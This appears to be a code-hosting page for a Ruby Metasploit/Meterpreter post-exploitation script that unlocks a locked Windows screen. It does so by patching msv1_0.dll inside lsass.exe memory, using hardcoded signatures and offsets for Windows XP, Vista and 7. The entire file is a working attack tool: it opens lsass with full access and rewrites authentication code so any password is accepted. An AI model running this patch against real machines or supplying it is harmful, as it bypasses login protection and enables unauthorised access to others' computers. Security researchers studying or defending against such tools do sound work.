73 lines
2.8 KiB
Ruby
73 lines
2.8 KiB
Ruby
|
#
|
||
|
# Script to unlock a windows screen by L4teral <l4teral [4t] gmail com>
|
||
|
# Needs system prvileges to run and known signatures for the target system.
|
||
|
# This script patches msv1_0.dll loaded by lsass.exe
|
||
|
#
|
||
|
# Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16
|
||
|
#
|
||
|
|
||
|
revert = false
|
||
|
targets = [
|
||
|
{ :sig => "8bff558bec83ec50a1", :sigoffset => 0x9927, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x99cc, :os => /Windows XP.*Service Pack 2/ },
|
||
|
{ :sig => "8bff558bec83ec50a1", :sigoffset => 0x981b, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x98c0, :os => /Windows XP.*Service Pack 3/ },
|
||
|
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
|
||
|
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
|
||
|
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
|
||
|
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
|
||
|
]
|
||
|
|
||
|
opts = Rex::Parser::Arguments.new(
|
||
|
"-h" => [ false,"Help menu." ],
|
||
|
"-r" => [ false, "revert the patch (enable screen locking again)"]
|
||
|
)
|
||
|
opts.parse(args) { |opt, idx, val|
|
||
|
case opt
|
||
|
when "-r"
|
||
|
revert = true
|
||
|
when "-h"
|
||
|
print_line("")
|
||
|
print_line("USAGE: run screen_unlock [-r]")
|
||
|
print_line(opts.usage)
|
||
|
raise Rex::Script::Completed
|
||
|
end
|
||
|
}
|
||
|
|
||
|
os = client.sys.config.sysinfo['OS']
|
||
|
|
||
|
targets.each do |t|
|
||
|
if os =~ t[:os]
|
||
|
target = t
|
||
|
print_status("OS '#{os}' found in known targets")
|
||
|
pid = client.sys.process["lsass.exe"]
|
||
|
p = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
|
||
|
dllbase = p.image["msv1_0.dll"]
|
||
|
|
||
|
sig = p.memory.read(dllbase + target[:sigoffset], target[:sig].length / 2).unpack("H*")[0]
|
||
|
if sig != target[:sig]
|
||
|
print_error("found signature does not match")
|
||
|
next
|
||
|
end
|
||
|
old_code = p.memory.read(dllbase + target[:patchoffset], target[:orig_code].length / 2).unpack("H*")[0]
|
||
|
if !((old_code == target[:orig_code] && !revert) || (old_code == target[:patch] && revert))
|
||
|
print_error("found code does not match")
|
||
|
next
|
||
|
end
|
||
|
|
||
|
print_status("patching...")
|
||
|
new_code = revert ? target[:orig_code] : target[:patch]
|
||
|
p.memory.write(dllbase + target[:patchoffset], [new_code].pack("H*"))
|
||
|
|
||
|
written_code = p.memory.read(dllbase + target[:patchoffset], target[:patch].length / 2).unpack("H*")[0]
|
||
|
if ((written_code == target[:patch] && !revert) || (written_code == target[:orig_code] && revert))
|
||
|
print_status("done!")
|
||
|
raise Rex::Script::Completed
|
||
|
else
|
||
|
print_error("failed!")
|
||
|
next
|
||
|
end
|
||
|
end
|
||
|
end
|
||
|
|
||
|
print_status("no working target found")
|
||
|
|